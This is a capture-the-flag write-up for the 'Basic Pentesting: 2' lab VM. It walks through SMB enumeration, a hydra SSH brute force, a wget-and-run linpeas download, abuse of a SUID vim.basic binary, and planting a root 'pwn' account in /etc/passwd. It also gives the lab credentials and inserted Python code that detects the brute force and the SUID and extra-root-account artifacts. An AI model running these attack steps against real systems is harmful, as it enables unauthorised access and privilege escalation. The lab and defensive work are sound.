Last updated: 15 Apr 24 09:28:30 (UTC)

Write-Up Basic-Pentest-2

Basic-Pentesting-2

By Lawcky 04/01/24

Introduction

small boot2root VM

Difficulty : easy +

Additional info:

Name: Basic Pentesting: 2
Release date: 10 Jul 2018
Author: Josiah Pierce
Series: Basic Pentesting

|NOTE| we won't copy all the scans here as they would be far too voluminous; click here to see them


In this write-up

  • nmap
  • nikto
  • ffuf
  • enum4linux

Write-UP

attacking SMB

we know that “J”'s password is weak; to get his username we use enum4linux,
which is an SMB enumeration tool

enum4linux 192.168.1.8


“J” is Jan and “K” is kay


now we can attack SSH using the jan user

sudo hydra -l jan -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://192.168.1.8/ -t 10 -I


we now have shell access to the target with:
jan:armando
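The hydra run above is exactly the pattern a defender can catch from the target's own sshd logs: a burst of failed passwords from one source followed by a success. The following added example is not part of the original write-up; it parses a few constructed auth.log lines (not captured from this machine) and raises an alert when a source IP produces a configurable number of failures inside a short window, and a second, more serious alert when a login succeeds right after such a burst. The threshold and window values are arbitrary choices for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (not from the target). The first block is
# what OpenSSH logs during a password-guessing run: failures, then one success.
SAMPLE_AUTH_LOG = """\
Apr  1 10:02:01 target sshd[1201]: Failed password for jan from 192.168.1.50 port 40110 ssh2
Apr  1 10:02:01 target sshd[1202]: Failed password for jan from 192.168.1.50 port 40112 ssh2
Apr  1 10:02:02 target sshd[1203]: Failed password for invalid user admin from 192.168.1.50 port 40114 ssh2
Apr  1 10:02:02 target sshd[1204]: Failed password for jan from 192.168.1.50 port 40116 ssh2
Apr  1 10:02:03 target sshd[1205]: Failed password for jan from 192.168.1.50 port 40118 ssh2
Apr  1 10:02:03 target sshd[1206]: Failed password for jan from 192.168.1.50 port 40120 ssh2
Apr  1 10:02:04 target sshd[1207]: Accepted password for jan from 192.168.1.50 port 40122 ssh2
Apr  1 10:05:30 target sshd[1300]: Failed password for kay from 192.168.1.77 port 51000 ssh2
Apr  1 10:05:45 target sshd[1301]: Accepted publickey for kay from 192.168.1.77 port 51002 ssh2
"""

# Matches the standard OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_auth_log(text):
    """Return one dict per recognised sshd authentication line, in file order."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Return alerts as (kind, ip, user, failure_count) tuples.

    'bruteforce' fires once when an IP reaches `threshold` failures within the
    window; 'success_after_bruteforce' fires when a login from that IP is
    accepted while the window still holds at least `threshold` failures.
    """
    recent_failures = defaultdict(list)  # ip -> timestamps of failures in window
    alerts = []
    for ev in events:
        # syslog timestamps carry no year; a dummy year is fine for deltas
        ts = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
        ip = ev["ip"]
        # drop failures that fell out of the sliding window
        recent_failures[ip] = [
            t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_seconds
        ]
        if ev["result"] == "Failed":
            recent_failures[ip].append(ts)
            if len(recent_failures[ip]) == threshold:
                alerts.append(("bruteforce", ip, ev["user"], threshold))
        elif len(recent_failures[ip]) >= threshold:
            alerts.append(("success_after_bruteforce", ip, ev["user"], len(recent_failures[ip])))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

On a real host the same logic is what fail2ban applies to sshd; the cheaper fix for this box is disabling password authentication in sshd_config so a wordlist never gets a chance.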


Privilege Escalation

found a backup directory in /var/


all of it belongs to the root user

we run linpeas for faster enumeration

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh


we can access the .ssh directory of the kay user

we cannot add our key to the authorized_keys file, but we can read it.


I found two ways to get kay's user:
the first one:

Crack his private SSH key using ssh2john, but I couldn't use ssh2john (error; I don't know how to use it, and it's annoying)

so I wanted to do it another way and looked at the SUID binaries

we cannot read the backup of kay's password, which is on his desktop

yet among the SUID binaries we find this:
find / -perm -4000 2>/dev/null


by running that binary directly on the backup file we are able to read it:

/usr/bin/vim.basic pass.bak


kay:heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Root Escalation

I found two ways to get root very easily on this machine

the first one is the free one:

kay has full sudo privileges


sudo su

the other can be done even from the jan user: since vim.basic is SUID root, you can use it to overwrite any file on the system, including /etc/shadow and /etc/passwd

thus we can create our own account and add it:

openssl passwd -1

/usr/bin/vim.basic /etc/passwd

and add the line

pwn:$1$2Yu25e5L$.p/Zc8VBVgBGHow.fvVlC.:0:0:hacked:/root:/bin/bash


pwn:hacked
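Both privilege-escalation paths on this box leave artifacts a local audit can spot: an editor carrying the SUID bit, and a second UID-0 entry in /etc/passwd with a hash stored inline instead of an "x". The following added example (not part of the write-up, and not a tool the box ships) performs both checks. `find_suid` does a real filesystem walk equivalent to the `find / -perm -4000` above; `classify_suid` compares the result with a baseline of SUID paths you expect, and `uid0_accounts` parses passwd text. The baseline set, the risky-name list and the sample inputs are constructed for the demonstration; the sample passwd reuses the `pwn` line from this write-up.

```python
import os
import stat

# Programs that hand out an arbitrary file read/write (or a shell) when they are
# SUID root. Constructed list for the example; extend it for your own baseline.
RISKY_SUID_NAMES = {
    "vim", "vim.basic", "vi", "nano", "less", "more",
    "bash", "sh", "python3", "perl", "find",
}

# Constructed: what a minimal Ubuntu-like baseline of SUID binaries might contain.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount",
    "/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh",
}

# Constructed: the SUID list an auditor might get back from this box.
SAMPLE_SUID_PATHS = [
    "/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount",
    "/bin/umount", "/usr/bin/newgrp", "/usr/bin/vim.basic",
]

# Constructed passwd excerpt; the last line is the account added in the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jan:x:1000:1000:jan:/home/jan:/bin/bash
kay:x:1001:1001:kay:/home/kay:/bin/bash
pwn:$1$2Yu25e5L$.p/Zc8VBVgBGHow.fvVlC.:0:0:hacked:/root:/bin/bash
"""


def find_suid(root="/"):
    """Walk `root` and return regular files with the SUID bit set (real scan)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def classify_suid(paths, baseline=EXPECTED_SUID):
    """Split SUID paths into those missing from the baseline and those whose
    basename is a known file-access primitive; both lists come back sorted."""
    unexpected = sorted(p for p in paths if p not in baseline)
    risky = sorted(p for p in paths if os.path.basename(p) in RISKY_SUID_NAMES)
    return {"unexpected": unexpected, "risky": risky}


def uid0_accounts(passwd_text):
    """Return every passwd entry with UID 0. Anything besides root is a backdoor
    candidate; a hash stored in field 2 (instead of 'x') means the account
    bypasses /etc/shadow entirely."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; passwd has exactly seven fields
        name, pw_field, uid = fields[0], fields[1], fields[2]
        if uid == "0":
            hits.append({
                "name": name,
                "shell": fields[6],
                "hash_in_passwd": pw_field not in ("x", "*", "!", ""),
            })
    return hits


def audit(suid_paths, passwd_text):
    """Combine both checks into one report dict."""
    report = classify_suid(suid_paths)
    report["uid0"] = uid0_accounts(passwd_text)
    report["extra_root_accounts"] = [a["name"] for a in report["uid0"] if a["name"] != "root"]
    return report


if __name__ == "__main__":
    # Run against the constructed samples; swap in find_suid("/") and the
    # contents of /etc/passwd to audit a live host.
    for key, value in audit(SAMPLE_SUID_PATHS, SAMPLE_PASSWD).items():
        print(f"{key}: {value}")
```

The SUID check is only as good as its baseline, so record the expected set on a freshly built host and diff against it; the passwd check is cheap enough to run from a cron job or as a file-integrity monitoring rule on /etc/passwd and /etc/shadow.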

got the flag